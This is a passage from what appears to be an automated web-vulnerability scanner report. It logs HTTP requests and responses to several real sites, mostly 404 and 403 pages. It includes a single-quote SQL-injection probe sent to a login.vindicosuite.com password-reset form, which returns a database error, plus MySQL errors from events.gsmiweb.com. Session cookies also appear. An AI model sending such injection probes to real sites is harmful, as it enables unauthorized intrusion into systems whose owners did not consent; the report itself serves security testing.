Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 24594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><head>

<link rel="stylesheet" href="http://gsmiweb.com/assets/templates/gsmi/css/default.advanced.css" type=
...[SNIP]...
31.3. https://events.gsmiweb.com/images/getconnected_fb.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /images/getconnected_fb.png

Request

GET /images/getconnected_fb.png HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.4. https://events.gsmiweb.com/images/getconnected_linkedin.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /images/getconnected_linkedin.png

Request

GET /images/getconnected_linkedin.png HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.5. https://events.gsmiweb.com/images/getconnected_rss.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /images/getconnected_rss.png

Request

GET /images/getconnected_rss.png HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.6. https://events.gsmiweb.com/images/getconnected_twitter.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /images/getconnected_twitter.png

Request

GET /images/getconnected_twitter.png HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.7. https://events.gsmiweb.com/images/getconnected_youtube.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /images/getconnected_youtube.png

Request

GET /images/getconnected_youtube.png HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1; PHPSESSID=n1ninf9mvtgucavvk20tlpt8n1

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:39:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Aug 2009 08:01:11 GMT
ETag: "d8064c-3bd-6fe21fc0"
Accept-Ranges: bytes
Content-Length: 957
Connection: close
Content-Type: text/html

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at gsmiweb.com
</ADDRESS>
</BODY>
</HTML
...[SNIP]...
31.8. https://events.gsmiweb.com/subscribe.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://events.gsmiweb.com
Path:   /subscribe.php

Request

GET /subscribe.php HTTP/1.1
Host: events.gsmiweb.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=246713051.1303999551.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246713051.480784472.1303999551.1303999551.1303999551.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:38:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=2nk15qm3tn7surn8vvl1ofsf05; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 307
Connection: close
Content-Type: text/html


<script language="javascript">
window.location.href="events.php";
</script>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the ri
...[SNIP]...
31.9. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2588783;type=nausc547;cat=naush134;u=80312807C795402E93C5016D2A2A3E1B;ord=7169916033744.81? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Fri, 06 May 2011 22:33:33 GMT
Expires: Fri, 06 May 2011 22:33:33 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- LeadBack Pixel:
...[SNIP]...
31.10. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeconferencing.liveoffice.com
Path:   /conferenceonline/scripts/putclicktocall.js

Request

GET /conferenceonline/scripts/putclicktocall.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: freeconferencing.liveoffice.com

Response

HTTP/1.1 404 Not Found
Content-Length: 6909
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:57 GMT

<html>
<head>
<title>Conference Calling: Toll Free Teleconferencing for Conference Calls by LiveOffice Conferencing</title>
<meta name="description" content="LiveOffice Teleconferencing | Reliable
...[SNIP]...
31.11. http://hmficweb.hinghammutual.com/admin//reglogin.aspx%3fReturnUrl%3d%252fadmin%252fDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /admin//reglogin.aspx%3fReturnUrl%3d%252fadmin%252fDefault.aspx

Request

GET /admin//reglogin.aspx%3fReturnUrl%3d%252fadmin%252fDefault.aspx HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/admin/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Fri, 06 May 2011 17:47:18 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
31.12. http://hmficweb.hinghammutual.com/billing_view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/

Request

GET /billing_view/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/billingview.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4009
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCDDDAA=IPHJKIBCJCNJALBDJMOOPNNJ; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
31.13. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/PaymentDetails.asp

Request

GET /billing_view/PaymentDetails.asp?id= HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 06 May 2011 17:35:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 688
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - View Payment Details</TITLE>
</
...[SNIP]...
31.14. http://hmficweb.hinghammutual.com/billing_view/login.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/login.asp

Request

GET /billing_view/login.asp HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: HinghamLoginError=Please+fill+in+all+values; ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3940
Content-Type: text/html
Set-Cookie: HinghamLoginError=; path=/billing_view
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
31.15. http://hmficweb.hinghammutual.com/css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /css/

Request

GET /css/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/css/hingham.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:07 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.16. http://hmficweb.hinghammutual.com/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /images/

Request

GET /images/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/images/home/button-go.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:32 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.17. http://hmficweb.hinghammutual.com/images/content/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /images/content/

Request

GET /images/content/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/images/content/login/button-login.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:51 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.18. http://hmficweb.hinghammutual.com/images/content/login/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /images/content/login/

Request

GET /images/content/login/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/images/content/login/button-login.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:50 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.19. http://hmficweb.hinghammutual.com/images/home/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /images/home/

Request

GET /images/home/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/images/home/button-go.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:31 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.20. http://hmficweb.hinghammutual.com/includes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /includes/

Request

GET /includes/ HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/includes/common.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:36:13 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...
31.21. http://kroogy.com/pub/banner_160_600.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_160_600.php

Request

GET /pub/banner_160_600.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/Linkbucks%20vlad%20modelS
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303658380.1303738749.6

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:03:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Refresh: 20
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 1487


<html>

<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
<div align=center>

<!--/* OpenX Javascript Tag v2.8.7 */-->

<script type='text/javascri
...[SNIP]...
31.22. http://kroogy.com/pub/banner_728_90_random.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /pub/banner_728_90_random.php

Request

GET /pub/banner_728_90_random.php HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 22:03:08 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Apr 2011 17:16:02 GMT
ETag: "800514-3bc-4a0f8323c7880"
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Content-Type: text/html
Content-Length: 956

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at kroogy.com
</ADDRESS>
</BODY>
</HTML>
...[SNIP]...
31.23. http://lbmc.imonitor.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lbmc.imonitor.net
Path:   /

Request

GET / HTTP/1.1
Host: lbmc.imonitor.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Content-Location: http://lbmc.imonitor.net/index.html
Date: Sat, 07 May 2011 01:34:01 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 16 Nov 2006 11:03:21 GMT
ETag: "a9bbefd36e9c71:eb1"
Content-Length: 121

<html>
<head>
<meta http-equiv="Refresh" content="0; URL=http://www.ilumennetwork.com/CPA/?org=lbmc">
</head>
</html>
31.24. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/Exec_Reset.asp

Request

POST /AccountManager/ResetPassword/Exec_Reset.asp HTTP/1.1
Referer: http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate
Content-Length: 43

username='&existingPassword=3&newPassword=3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 139
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:30:36 GMT

<div class = 'ErrorDIV'>Error occured while retreiving data from the database</div><div class = 'ErrorDIV'>Incorrect syntax near '3'.</div>
31.25. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /AccountManager/ResetPassword/index.asp

Request

GET /AccountManager/ResetPassword/index.asp?message=Invalid%20Username%20/%20Password HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 3660
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:19:36 GMT


<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<!--
edited by Tim Whidden Today is 1/13/11. It is now 9:23 AM
-->
<head>
   <title>Password Reset</title>
   
   <script type="text
...[SNIP]...
31.26. http://login.vindicosuite.com/vindico_dynamic.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /vindico_dynamic.asp

Request

POST /vindico_dynamic.asp HTTP/1.1
Referer: http://login.vindicosuite.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=PKNPJKACDKPMJMDBOBBDNAGH
Accept-Encoding: gzip, deflate
Content-Length: 103

